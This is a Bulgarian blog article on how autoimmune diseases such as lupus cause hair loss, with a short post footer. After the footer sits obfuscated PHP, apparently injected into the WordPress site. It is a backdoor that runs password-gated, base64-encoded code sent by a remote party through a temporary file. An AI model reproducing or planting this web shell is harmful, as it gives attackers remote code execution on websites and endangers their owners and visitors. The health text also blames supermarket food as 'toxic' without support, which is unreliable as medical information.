Може ли заболяване на имунната система да предизвика косопад? | Косопад

Косопад и заболявания на имунната система

косопад и лупус

Косопад и лупус

Различните заболявания на имунната система са сред основните причинители на косопад. В съвременното българско общество твърде много хора имат проблеми от подобно естество, като основните причини за това са стресът, откровено отровните хранителни продукти в търговските вериги, прекомерните нива на шум в градска среда и др.

Сред основните автоимунни заболявания водещи до косопад е лупус, който предизвиква широко разпространено възпаление. Обичайно то обхваща кожата, а особено много зоните по лицето и скалпа. Вследствие на лупус може да се стигне до пълно оплешивяване, както и на опадане на окосмението по веждите, миглите, лицето и тялото.

Донякъде успокояващо е, че в повечето случаи косата започва да расте сама след туширане проблемите на имунната система и последствието косопад напълно изчезва. При малка част от пациентите обаче остават перманентни плешиви петна с кръгла форма, а в тези зони космените фоликули са напълно увредени.

Автоимунните заболявания могат да станат причинители и на друг вид косопад. В някои случаи косата просто оредява и изтънява, а в други се оформя типичния за андрогенната алопеция тип плешивост. Ненадейната поява на косопад може да се тълкува и като ранен симптом на болести на имунната система и ако забележите необичайно изтъняване на косата веднага потърсете лекарска помощ.

11. юни 2013 23:09:08 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}